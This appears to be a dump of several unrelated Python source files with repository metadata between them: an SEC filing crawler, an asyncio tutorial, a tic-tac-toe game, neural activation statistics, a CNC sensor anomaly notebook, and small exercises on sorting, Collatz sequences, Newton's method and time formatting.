# -*- coding:utf-8 -*-
# This script will download all the 10-K, 10-Q and 8-K
# provided that of company symbol and its cik code.
class HoldingInfoNotFoundException(Exception):
pass
import requests
import os
import errno
from bs4 import BeautifulSoup
import pandas as pd
import numpy as np
cik_list = pd.read_csv('/Users/shuhao/Dropbox/Python Project/CIK-2010.csv')
class SecCrawler():
def __init__(self):
self.hello = "Welcome to Sec Cralwer!"
print("Path of the directory where data will be saved: " + DEFAULT_DATA_PATH)
def make_directory(self, cik, filing_type):
# Making the directory to save comapny filings
path = os.path.join(DEFAULT_DATA_PATH, cik, filing_type)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def save_in_directory(self, cik=None, doc_list=None,
doc_name_list=None, filing_type=None):
# Save every text document into its respective folder
for j in range(len(doc_list)):
base_url = doc_list[j]
r = requests.get(base_url)
data = r.text
path = os.path.join(DEFAULT_DATA_PATH, cik,
filing_type, doc_name_list[j])
with open(path, "ab") as f:
f.write(data.encode('ascii', 'ignore'))
def filing_NQ(self,cik, count):
self.make_directory(cik=cik, filing_type='NQ')
# generate the url to crawl
base_url = "https://www.sec.gov/cgi-bin/browse-edgar?action=getcompany&CIK="+str(cik)+"&type=N-Q&owner=exclude&output=xml&count=" +str(count)
print("started N-Q " + str(cik))
r = requests.get(base_url)
data = r.text
print(data)
# get doc list data
doc_list, doc_name = self.create_document_list(data)
# try:
# doc_list, doc_name_list = self.create_document_list(data)
# except:
# erro_cik = erro_cik.append(cik)
# pass
try:
self.save_in_directory(cik=cik, filing_type='NQ', doc_list=doc_list, doc_name_list=doc_name_list)
except Exception as e:
print(str(e))
print("Successfully downloaded all the files")
def create_document_list(self, data):
# parse fetched data using beatifulsoup
soup = BeautifulSoup(data)
# store the link in the list
link_list = list()
# If the link is .htm convert it to .html
for link in soup.find_all('filinghref'):
url = link.string
if link.string.split(".")[len(link.string.split("."))-1] == "htm":
url += "l"
link_list.append(url)
link_list_final = link_list
print ("Number of files to download {0}".format(len(link_list_final)))
print ("Starting download....")
# List of url to the text documents
doc_list = list()
# List of document names
doc_name_list = list()
if len(link_list_final) == 0:
pass
else:
# Get all the doc
# for k in range(len(link_list_final)):
for k in range(1):
required_url = link_list_final[k].replace('-index.html', '')
txtdoc = required_url + ".txt"
docname = txtdoc.split("/")[-1]
doc_list.append(txtdoc)
doc_name_list.append(docname)
return doc_list, doc_name_list
for cik in cik_list['CIK Number']:
data = SecCrawler()
get_report = data.filing_NQ('000'+ str(cik), '1')
| true |
4d68b1e6413d7d15f01902a1f3b32a86b4fde8ae | Python | zhangweisgithub/demo | /python_module/asyncio_module/case2.py | UTF-8 | 2,633 | 3.828125 | 4 | [] | no_license | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
可等待对象
如果一个对象可以在 await 语句中使用,那么它就是 可等待 对象。许多 asyncio API 都被设计为接受可等待对象。
可等待 对象有三种主要类型: 协程, 任务 和 Future.
"""
print("---------------------协程-------------------------")
"""
协程函数: 定义形式为 async def 的函数;
协程对象: 调用 协程函数 所返回的对象。
"""
import asyncio
async def nested():
return 42
async def main():
# Nothing happens if we just call "nested()".
# A coroutine object is created but not awaited,
# so it *won't run at all*.
# nested() # 筑巢; 巢居; 嵌套(信息);
# Let's do it differently now and await it:
print(await nested()) # will print "42".
asyncio.run(main())
print("---------------------任务-------------------------")
"""
任务 被用来设置日程以便 并发 执行协程。
当一个协程通过 asyncio.create_task() 等函数被打包为一个 任务,该协程将自动排入日程准备立即运行:
"""
import asyncio
async def nested():
print("ssss")
return 42
async def main():
# Schedule nested() to run soon concurrently
# with "main()".
task = asyncio.create_task(nested())
# "task" can now be used to cancel "nested()", or
# can simply be awaited to wait until it is complete:
await task
asyncio.run(main())
print("---------------------Future 对象-------------------------")
"""
Future 是一种特殊的 低层级 可等待对象,表示一个异步操作的 最终结果。
当一个 Future 对象 被等待,这意味着协程将保持等待直到该 Future 对象在其他地方操作完毕。
在 asyncio 中需要 Future 对象以便允许通过 async/await 使用基于回调的代码。
通常情况下 没有必要 在应用层级的代码中创建 Future 对象。
Future 对象有时会由库和某些 asyncio API 暴露给用户,用作可等待对象:
"""
print("---------------------sleep-------------------------")
"""
一、获取事件循环
asyncio.get_running_loop()
返回当前 OS 线程中正在运行的事件循环。
如果没有正在运行的事件循环则会引发 RuntimeError。 此函数只能由协程或回调来调用。
"""
import datetime
async def display_date():
loop = asyncio.get_running_loop()
end_time = loop.time() + 5.0
print("end_time:", end_time)
while True:
print(datetime.datetime.now())
if (loop.time() + 1.0) >= end_time:
break
await asyncio.sleep(1)
asyncio.run(display_date())
| true |
cf6fb96b2e2dd3c49fd399938623478f8d986fdd | Python | bolton-nate/ttt_minimax | /main.py | UTF-8 | 4,080 | 3.484375 | 3 | [] | no_license | # This is where your main() function will go.
# The main() function will tie all other functions together.
# You may add other functions here as needed.
from userInput import *
from computerInput import *
from computerRandom import *
from computerMinimax import *
from computerAlphaBeta import *
from Game import *
totalFC = 0
def main():
global totalFC
seriesResults = [0, 0, 0] # ties, count of player1 wins, player2 wins
player1Name = player2Name = None
print("\n\nWelcome To Tic Tac Toe\n")
while player1Name not in ['h', 'H', '1', '2', '3', '4']:
print("Player 1, please select player type:\nh: HUMAN PLAYER\n1: RULES AI\n2: RANDOM AI\n3: MINIMAX AI\n4: ALPHA BETA AI\n")
player1Name = input("Choose:")
while player2Name not in ['h', 'H', '1', '2', '3', '4']:
print("\nPlayer 2, please select player type:\nh: HUMAN PLAYER\n1: RULES AI\n2: RANDOM AI\n3: MINIMAX AI\n4: ALPHA BETA AI\n")
player2Name = input("Choose:")
if player1Name in ['1', '2', '3', '4'] and player2Name in ['1', '2', '3', '4']:
repeatGames = int(input("\nHow many games would you like the AI to play: "))
while repeatGames < 1:
repeatGames = int(input("Please select 1 or more games. How many games would you like the AI to play: "))
else:
repeatGames = 1
for i in range(repeatGames):
ttt = Game()
while ttt.winnerVar == 0:
if not ttt.getEmpties():
seriesResults[0] += 1
print("\nGAME OVER")
print("Tie Game. Nobody Wins.")
print("Number of minimax calls for game #", sum(seriesResults), ": ", ttt.masterFC, sep="")
print("Move History:", ttt.moveHistory)
print("Final Board:\n", ttt.drawTheBoard(), "\n", sep="")
totalFC += ttt.masterFC
del ttt
break
if repeatGames < 2:
print("\nPlayer " + str(ttt.curPlayer) + "'s Turn")
print("The Current Board Is:")
print(ttt.drawTheBoard())
if ttt.curPlayer == 1:
if player1Name.lower() == "1":
computerPlayer(ttt)
elif player1Name.lower() == "2":
computerRandom(ttt)
elif player1Name.lower() == "3":
computerMinimax(ttt)
elif player1Name.lower() == "4":
computerAlphaBeta(ttt)
else:
userInput(ttt)
else:
if player2Name.lower() == "1":
computerPlayer(ttt)
elif player2Name.lower() == "2":
computerRandom(ttt)
elif player2Name.lower() == "3":
computerMinimax(ttt)
elif player2Name.lower() == "4":
computerAlphaBeta(ttt)
else:
userInput(ttt)
ttt.winnerVar = ttt.checkForWinner()
# print winnerVar
if ttt.winnerVar != 0:
seriesResults[ttt.curPlayer] += 1
# if (ttt.curPlayer == 1 and player1Name.lower() == "r") or (ttt.curPlayer == 2 and player2Name.lower() == "r"):
# print(ttt.moveHistory)
print("\nGAME OVER")
print("Winner: Player", ttt.winnerVar)
print("Number of minimax calls for game #", sum(seriesResults), ": ", ttt.masterFC, sep="")
print("Move History:", ttt.moveHistory)
print("Final Board:\n", ttt.drawTheBoard(), "\n", sep="")
totalFC += ttt.masterFC
del ttt
break
#alternate player
ttt.curPlayer = ttt.curPlayer % 2 + 1
if repeatGames > 1:
print("Final series results: ", seriesResults[0], "ties, ", seriesResults[1], "Player1 wins, ", seriesResults[2], "Player2 wins.")
print("Total Number of calls to the minimax algorithm for all games:", totalFC)
main()
| true |
eb9de6d661fa1ed71f06142a46caae0a59f52529 | Python | try1995/Linear-classifier | /activation_statistic.py | UTF-8 | 1,527 | 3.015625 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
from time import time
'''激活函数策略和权值的选择'''
start = time()
D = np.random.randn(1000, 500)
hidden_layer_sizes = [500]*10
nonlinearities = ['tanh']*len(hidden_layer_sizes)
'''激活函数'''
act = {"relu": lambda x: np.maximum(0, x), 'tanh': lambda x: np.tanh(x),
'sigmoid': lambda x: 1/(1+np.exp(-x)), 'leaky_relu': lambda x: np.maximum(0.1*x, x),
'elu': lambda x: np.where(x > 0, x, np.exp(x)-1)}
Hs = {}
for i in range(len(hidden_layer_sizes)):
X = D if i == 0 else Hs[i-1]
fan_in = X.shape[1]
fan_out = hidden_layer_sizes[i]
'''不同的权重'''
W = np.random.randn(fan_in, fan_out) / np.sqrt(fan_in)
# W = np.random.randn(fan_in, fan_in) * 0.01
# W = np.random.randn(fan_in, fan_in) / np.sqrt(fan_in/2)
H = np.dot(X, W)
H = act[nonlinearities[i]](H)
Hs[i] = H
print('input layer had mean %s and std %s' % (np.mean(D), np.std(D)))
layer_means = [np.mean(H) for i, H in Hs.items()]
layer_stds = [np.std(H) for i, H in Hs.items()]
for i, H in Hs.items():
print('hidden layer %s had mean %s and std %s' % (i+1, layer_means[i], layer_stds[i]))
'''图形展示'''
plt.figure()
plt.subplot(121)
plt.plot(Hs.keys(), layer_means, 'ob-')
plt.title('layer mean')
plt.subplot(122)
plt.plot(Hs.keys(), layer_stds, 'or-')
plt.title('layer std')
plt.figure()
for i, H in Hs.items():
plt.subplot(1, len(Hs), i+1)
plt.hist(H.ravel(), 30, range=(-1, 1))
end = time()
print(end-start)
plt.show()
| true |
f26eeb9f03ebac01629696e35ea122aa535e7bbf | Python | Kimseongick/2017_NIMS_CNC_Problem | /04_Code.py | UTF-8 | 8,933 | 2.625 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
# Jupyter-notebook export: exploratory analysis of five CNC sensor datasets.
# In[1]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
# Load the five raw CSV files; they carry no header row and no index column.
data_1 = pd.read_csv('data/data_1.csv', header=None, index_col=None)
data_2 = pd.read_csv('data/data_2.csv', header=None, index_col=None)
data_3 = pd.read_csv('data/data_3.csv', header=None, index_col=None)
data_4 = pd.read_csv('data/data_4.csv', header=None, index_col=None)
data_5 = pd.read_csv('data/data_5.csv', header=None, index_col=None)
# In[3]:
# Columns 2..end hold the measured time series; convert them to plain
# NumPy arrays (one row per recorded run).
data_frame1 = np.array(data_1[list(range(2,np.shape(data_1)[1]))])
data_frame2 = np.array(data_2[list(range(2,np.shape(data_2)[1]))])
data_frame3 = np.array(data_3[list(range(2,np.shape(data_3)[1]))])
data_frame4 = np.array(data_4[list(range(2,np.shape(data_4)[1]))])
data_frame5 = np.array(data_5[list(range(2,np.shape(data_5)[1]))])
# In[4]:
# Column 0 is used as a per-run error flag by the cells below
# (0 = normal, nonzero = error) -- presumably the dataset label;
# TODO confirm against the data description.
error_list1 = list(data_1[0])
error_list2 = list(data_2[0])
error_list3 = list(data_3[0])
error_list4 = list(data_4[0])
error_list5 = list(data_5[0])
# In[6]:
# Overview: draw every run of each dataset in its own panel of a 3x3
# subplot grid (datasets 1-5 occupy the first five panels).
plt.figure(figsize=(16,9))
plt.subplot(331)
for i in range(len(data_frame1)):
    plt.plot(data_frame1[i])
plt.subplot(332)
for i in range(len(data_frame2)):
    plt.plot(data_frame2[i])
plt.subplot(333)
for i in range(len(data_frame3)):
    plt.plot(data_frame3[i])
plt.subplot(334)
for i in range(len(data_frame4)):
    plt.plot(data_frame4[i])
plt.subplot(335)
for i in range(len(data_frame5)):
    plt.plot(data_frame5[i])
# -------------------------
# In[18]:
# Dataset 1: draw normal runs in blue and error-flagged runs in red,
# echoing the row index of every flagged run.
plt.figure(figsize=(16,9))
for i in range(len(data_frame1)):
    if error_list1[i] == 0:
        plt.plot(data_frame1[i],"b")
    else:
        plt.plot(data_frame1[i],"r")
        print("error index : ", i)
# In[19]:
# Dataset 2, same colouring.
plt.figure(figsize=(16,9))
for i in range(len(data_frame2)):
    if error_list2[i] == 0:
        plt.plot(data_frame2[i],"b")
    else:
        plt.plot(data_frame2[i],"r")
        print("error index : ", i)
# In[8]:
# Dataset 3.
plt.figure(figsize=(16,9))
for i in range(len(data_frame3)):
    if error_list3[i] == 0:
        plt.plot(data_frame3[i],"b")
    else:
        plt.plot(data_frame3[i],"r")
        print("error index : ", i)
# In[9]:
# Dataset 4.
plt.figure(figsize=(16,9))
for i in range(len(data_frame4)):
    if error_list4[i] == 0:
        plt.plot(data_frame4[i],"b")
    else:
        plt.plot(data_frame4[i],"r")
        print("error index : ", i)
# In[24]:
# Dataset 5.
plt.figure(figsize=(16,9))
for i in range(len(data_frame5)):
    if error_list5[i] == 0:
        plt.plot(data_frame5[i],"b")
    else:
        plt.plot(data_frame5[i],"r")
        print("error index : ", i)
# -----------------------------
# In[22]:
# Candidate scalar feature: mean of the run-to-run differences of dataset 2.
feature = np.mean(np.diff(data_frame2, axis=0), axis=1)
#feature2 = np.mean(data_frame1, axis=1)
# In[23]:
plt.plot(feature, ".")
# In[25]:
# Zoom in on samples 30-150 of every dataset-2 run.
plt.figure(figsize=(12,9))
for i in range(len(data_frame2)):
    plt.plot(data_frame2[i][30:150])
# In[14]:
# First differences of samples 50-150 of every dataset-2 run.
for i in range(len(data_frame2)):
    plt.plot(np.diff(data_frame2[i][50:150], axis=0))
# ## 공지사항 12월 26일
# - 저녁 식사 후 그룹을 나눌 예정입니다.
# - 수료증(참가 확인증)을 위해서는 저녁모임에도 참석하셔야 합니다.
# - 금요일 결과발표 지원자 받습니다.
# - 베이즈 정리 및 기타 통계적 접근
# - 다중 회귀분석
# - derivative
# ## 공지사항 12월 27일
# - 반갑습니다.
# - 금일 저녁은 만찬입니다.
# In[26]:
# Dataset 3: draw normal runs in grey first, then overlay the error runs
# in default colours so they stand out.
plt.figure(figsize=(16,9))
err_dt = []
for i in range(len(data_frame3)):
    if error_list3[i] == 0:
        plt.plot(data_frame3[i],"grey")
    else:
        err_dt.append(data_frame3[i])
#        plt.plot(data_frame3[i])
        print("error index : ", i)
for i in err_dt:
    plt.plot(i)
plt.show()
# In[30]:
# Same overlay plot for dataset 5.
data_frame = data_frame5
error_list = error_list5
plt.figure(figsize=(16,9))
err_dt = []
for i in range(len(data_frame)):
    if error_list[i] == 0:
        plt.plot(data_frame[i],"grey")
    else:
        err_dt.append(data_frame[i])
#        plt.plot(data_frame3[i])
        print("error index : ", i)
for i in err_dt:
    plt.plot(i)
plt.show()
# In[31]:
# Same overlay plot for dataset 4 (lighter background colour).
data_frame = data_frame4
error_list = error_list4
plt.figure(figsize=(16,9))
err_dt = []
for i in range(len(data_frame)):
    if error_list[i] == 0:
        plt.plot(data_frame[i],"#ECDADA")
    else:
        err_dt.append(data_frame[i])
        print("error index : ", i)
for i in err_dt:
    plt.plot(i)
plt.show()
# In[27]:
# NOTE(review): this cell was corrupted in the original file -- a verbatim
# copy of func_chk/model_01 (defined intact in In[34] below) had been
# pasted into the middle of the loop, leaving unparseable code.  Restored
# to the evident intent: average all non-error runs of dataset 1 into a
# reference curve.
ever_list1 = []
for i in range(len(data_frame1)):
    if error_list1[i] == 0:
        ever_list1.append(data_frame1[i])
ever1 = np.mean(ever_list1, 0)
# In[28]:
def angle(v, u):
    """Return the angle in radians between vectors *v* and *u*.

    Computed as arccos of the cosine similarity.  FIX: the ratio is
    clipped to [-1.0, 1.0] so that floating-point round-off for (anti-)
    parallel vectors cannot push it outside arccos's domain and yield NaN.
    """
    cos_sim = np.dot(v, u) / (np.sqrt(np.dot(v, v)) * np.sqrt(np.dot(u, u)))
    return np.arccos(np.clip(cos_sim, -1.0, 1.0))
# In[30]:
# Angle of each non-error run of dataset 1 against the reference curve.
# FIXES: Python 2 ``print`` statements (a syntax error in this Python 3
# notebook export) converted to calls, and the undefined name ``ever``
# corrected to ``ever1`` (the reference curve assigned in In[27]).
for i in range(len(data_frame1)):
    if error_list1[i] == 0:
        print('good', angle(ever1, data_frame1[i]))
# In[31]:
# Same comparison for the runs flagged as errors.
for i in range(len(data_frame1)):
    if error_list1[i] == 1:
        print('bad', angle(ever1, data_frame1[i]))
# In[32]:
# Build the dataset-2 reference curve from the non-error runs, then report
# the angle of every run against it.
# FIX: Python 2 ``print`` statements (a syntax error in this Python 3
# notebook export) converted to function calls.
ever_list2 = []
for i in range(len(data_frame2)):
    if error_list2[i] == 0:
        ever_list2.append(data_frame2[i])
ever2 = np.mean(ever_list2, 0)
for i in range(len(data_frame2)):
    if error_list2[i] == 0:
        print('good', angle(ever2, data_frame2[i]))
for i in range(len(data_frame2)):
    if error_list2[i] == 1:
        print('bad', angle(ever2, data_frame2[i]))
# In[34]:
def func_chk(_data, _mean, _var, _Z_val):
    """Fraction of samples lying outside the per-index Z-band.

    Sample ``_data[i]`` counts as an outlier when it falls outside
    ``_mean[i] +/- _var[i] * _Z_val`` (``_var`` is passed the running
    standard deviation by model_01).  Returns outliers / len(_data).
    """
    outliers = 0
    for idx in range(len(_data)):
        upper = _mean[idx] + _var[idx] * _Z_val
        lower = _mean[idx] - _var[idx] * _Z_val
        if _data[idx] > upper or _data[idx] < lower:
            outliers += 1
    return outliers / len(_data)
def model_01(data_frame, diff_ratio, Z_val, train_size):
    """Online anomaly screen over the rows of *data_frame*.

    Maintains a running per-index mean/std over all rows seen so far.
    After the first *train_size* rows, each new row is scored with
    func_chk (fraction of samples outside mean +/- std * Z_val); a row
    whose fraction exceeds *diff_ratio* is flagged as an anomaly.
    Finally three figures are drawn: the data with the first flagged
    anomaly highlighted, the per-row over-count ratio, and the 0/1
    anomaly flags.

    NOTE(review): flagged rows still update the running statistics, and
    the first plotting loop ``break``s at the first anomaly so later rows
    are not drawn -- presumably intentional ("stop at first detection"),
    but worth confirming.
    """
    # initialize running statistics from the first row
    n = 1
    data_sum = data_frame[0]
    data_square_sum = data_frame[0]*data_frame[0]
    data_mean = data_sum/n
    data_var = data_square_sum/n - data_mean*data_mean  # E[x^2] - E[x]^2
    data_sqrt = np.sqrt(data_var)
    over_cnt = [0]       # per-row fraction of out-of-band samples
    eval_anomaly = [0]   # per-row 0/1 anomaly flag
    for i in range(1,len(data_frame)):
        data, n = data_frame[i], i+1
        if i > train_size:
            # Score against the statistics of the rows seen so far.
            over_cnt.append(func_chk(data,data_mean,data_sqrt,Z_val))
            if over_cnt[i] > diff_ratio :
                eval_anomaly.append(1)
            else:
                eval_anomaly.append(0)
        else :
            # Still in the training window: never flag.
            over_cnt.append(0)
            eval_anomaly.append(0)
        # Fold the current row into the running mean/std.
        data_sum = data_sum + data
        data_square_sum = data_square_sum + data*data
        data_mean = data_sum/n
        data_var = data_square_sum/n - data_mean*data_mean
        data_sqrt = np.sqrt(data_var)
    # Plot the data, stopping at (and highlighting) the first anomaly.
    err_dt = []
    plt.figure(figsize=(16,9))
    plt.title("Total Data")
    for i in range(len(data_frame)):
        if eval_anomaly[i] == 1: # anomaly!
            print("anomaly : ",i)
            err_dt.append(data_frame[i])
            break
        else:
            plt.plot(data_frame[i],"#ECDADA")
    for i in err_dt:
        plt.plot(i)
    plt.show()
    plt.figure(figsize=(6,4))
    plt.title("Over count ratio")
    plt.plot(over_cnt)
    plt.show()
    plt.figure(figsize=(6,4))
    plt.title("Detect anomaly")
    plt.plot(eval_anomaly)
    plt.show()
# In[ ]:
| true |
62ea2f4508ce0d0dc9efe8c61e76abeeacd98985 | Python | gustavobiage/URI_Solutions | /AD-HOC/1441.py | UTF-8 | 180 | 3.125 | 3 | [] | no_license | while 1:
    # Read one value per line; a 0 terminates the input
    # (URI 1441, "hailstone"/Collatz sequences).
    hstr = input()
    h = int(hstr)
    if h == 0:
        break
    # Track the largest value reached while iterating the Collatz map
    # (3h+1 for odd h, h/2 for even h) until h reaches 1.
    m = 1
    while h != 1:
        if h > m:
            m = h
        if h % 2 == 1:
            h = 3 * h + 1
        else:
            h = h / 2
        h = int(h)  # h/2 is float division in Python 3; restore int
    print(m)
f7a8ab7ad061c1a5433d7d9a1867909a30be186e | Python | hatopoppoK3/AtCoder-Practice | /AOJ/ALDS1/002/C.py | UTF-8 | 845 | 3.59375 | 4 | [] | no_license | def bubble_sort(A, N):
    """Bubble-sort *A* (pairs of (char, key)) ascending by key.

    Returns the sorted elements rendered as 'char+key' strings.  Bubble
    sort is stable, so equal keys keep their input order -- the caller
    relies on this and prints 'Stable' unconditionally for this result.
    """
    A = list(A)  # copy so the caller's tuple is not consumed
    for i in range(1, N):
        for j in range(0, N-i):
            # Swap adjacent out-of-order pairs (strict > keeps stability).
            if A[j][1] > A[j+1][1]:
                A[j], A[j+1] = A[j+1], A[j]
    tmp = []
    for x, y in A:
        tmp.append(x+str(y))
    return tmp
def selection_sort(A, N):
    """Selection-sort *A* (pairs of (char, key)) ascending by key.

    Returns the sorted elements rendered as 'char+key' strings.
    Selection sort is not stable: equal keys may be reordered relative
    to the input, which is what the caller's Stable / Not stable
    comparison against bubble_sort detects.
    """
    items = list(A)  # work on a copy; the caller passes a tuple
    for front in range(0, N - 1):
        # Locate the smallest remaining key (first occurrence wins).
        smallest = front
        for probe in range(front + 1, N):
            if items[smallest][1] > items[probe][1]:
                smallest = probe
        if smallest != front:
            items[front], items[smallest] = items[smallest], items[front]
    return [card + str(value) for card, value in items]
# Read the card count and the cards themselves (e.g. "H4 C9 S4 D2 C3").
N = int(input())
X = input().split()
# Split each token into a (suit_char, numeric_value) pair.
A = tuple((card[0], int(card[1])) for card in X)
a = bubble_sort(A, N)
print(*a)
# Bubble sort is always stable.
print('Stable')
b = selection_sort(A, N)
print(*b)
# Selection sort is stable only when it happens to match the stable order.
if a == b:
    print('Stable')
else:
    print('Not stable')
| true |
adc02d239be6ef8375f83e00f752deb9bfcb75c5 | Python | araghuram3/SF_NN | /evaluate_data.py | UTF-8 | 1,234 | 2.59375 | 3 | [] | no_license | # script to process data
# Evaluate the trained SF_NN model on images placed in ./test/.
# NOTE: the data layout is assumed -- images live in a "test" folder in
# the same directory as this script.
import matplotlib.pyplot as plt
import numpy as np  # FIX: numpy was used below but never imported
# tensorflow statements
import tensorflow as tf
layers = tf.keras.layers
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
tf.compat.v1.disable_eager_execution()
# project helper functions
from sf_nn_util import loadImagesFromDir, createConfMat, dispError, createData, visualizeWrongPredictions
# Load the trained model from disk.
model_nameNpath = './sf_nn_model.h5'
new_model = load_model(model_nameNpath)
# Evaluate the test data.
path2data = './test/'
# FIX: img_size was referenced but never defined (NameError at runtime).
# TODO(review): set this to the image size the model was trained with
# (see sf_nn_util / the training script).
img_size = 224
images = loadImagesFromDir(path2data, img_size)  # might need a processing step to make it usable in testing
predictions = new_model.predict(images)
# FIX: the original sized predict_vec with the undefined name x_test;
# take one predicted class index per input frame instead.
predict_vec = np.argmax(predictions, axis=1)
plt.plot(predict_vec)
plt.xlabel('Frames')
plt.ylabel('Prediction')
plt.show()
# right now there is no way to score this without ground-truth labels
1330e427651c295ed4b4cb79f33bc2bce1743d97 | Python | ycxzfforever/Python_Study | /time.py | UTF-8 | 1,184 | 3.515625 | 4 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time; # 引入time模块
import calendar;
ticks = time.time()
print "当前时间戳为:", ticks
localtime = time.localtime(time.time())
print "当前时间结构体:",localtime
print "当前时间:",time.asctime(localtime)
# 格式化成2016-03-20 11:45:39形式
print time.strftime("%Y-%m-%d %H:%M:%S %A %B %x %X %Z", time.localtime())
# 格式化成Sat Mar 28 22:24:24 2016形式
print time.strftime("%a %b %d %H:%M:%S %Y", time.localtime())
# 将格式字符串转换为时间戳
a = "Sat Mar 28 22:24:24 2016"
print time.mktime(time.strptime(a,"%a %b %d %H:%M:%S %Y"))
cal = calendar.month(2018, 5)
print "以下输出2016年5月份的日历:"
print cal;
import datetime;
i = datetime.datetime.now()
print ("当前的日期和时间是 %s" % i)
print ("ISO格式的日期和时间是 %s" % i.isoformat() )
print ("当前的年份是 %s" %i.year)
print ("当前的月份是 %s" %i.month)
print ("当前的日期是 %s" %i.day)
print ("dd/mm/yyyy 格式是 %s/%s/%s" % (i.day, i.month, i.year) )
print ("当前小时是 %s" %i.hour)
print ("当前分钟是 %s" %i.minute)
print ("当前秒是 %s" %i.second)
| true |
2a28c8391fc043e005b0e27e0109492299030186 | Python | KarenWest/pythonClassProjects | /newtonRaphsonMethod.py | UTF-8 | 1,090 | 4 | 4 | [] | no_license | #Summary - admittedly--had help from internet search here! Have not learned all these tricks yet.
# Solve for a zero of function using Newton-Raphson method
#Usage
# real = func(real)
# real = funcd(real)
# real = newton(func, funcd, real [, TOL=real])
#""" Ubiquitous Newton-Raphson algorithm for solving f(x) = 0 where a root is repeatedly estimated by x = x - f(x)/f'(x)
#until |dx|/(1+|x|) < TOL is achieved. This termination condition is a compromise between |dx| < TOL,
#if x is small |dx|/|x| < TOL, if x is large """
def newton(func, funcd, x, TOL=1e-6):
    """Newton-Raphson root finding: solve func(x) == 0.

    Repeatedly refines x via x -= func(x)/funcd(x) until the step is
    small: |dx| / (1 + |x|) < TOL (a compromise between absolute and
    relative tolerance -- see the module comment above).

    func  -- f(x);  funcd -- its derivative f'(x);  x -- initial guess.
    Returns the refined root estimate.  Prints every iteration so the
    (not globally guaranteed) convergence can be watched; loops forever
    if the iteration never converges, and raises ZeroDivisionError when
    funcd(x) evaluates to 0.
    """
    # f(x)=func(x), f'(x)=funcd(x)
    f, fd = func(x), funcd(x)
    count = 0
    while 1:
        dx = f / float(fd)
        if abs(dx) < TOL * (1 + abs(x)):
            return x - dx
        x = x - dx
        f, fd = func(x), funcd(x)
        count = count + 1
        # FIX: parenthesised print is valid under both Python 2 and 3;
        # the original Python 2 print statement is a syntax error in 3.
        print("newton(%d): x=%s, f(x)=%s" % (count, x, f))
#Even though it converges quadratically once a root has been "sighted", it does #not guarantee global convergence.
#So, I use print statement to see intermediate results.
| true |
d682a3f8a3332e2e45fd66d7cfdb97138375c071 | Python | KiranChavan326/sdet | /python/acc2.py | UTF-8 | 153 | 3.8125 | 4 | [] | no_license | num = int(input("Enter the number :"))
# Report the parity of the number read above ("num").
mod = num % 2
if mod > 0:
    # FIX: message typo -- "old number" -> "odd number".
    print("You picked the odd number")
else:
    # FIX: message typo -- "numer" -> "number".
    print("You picked the even number")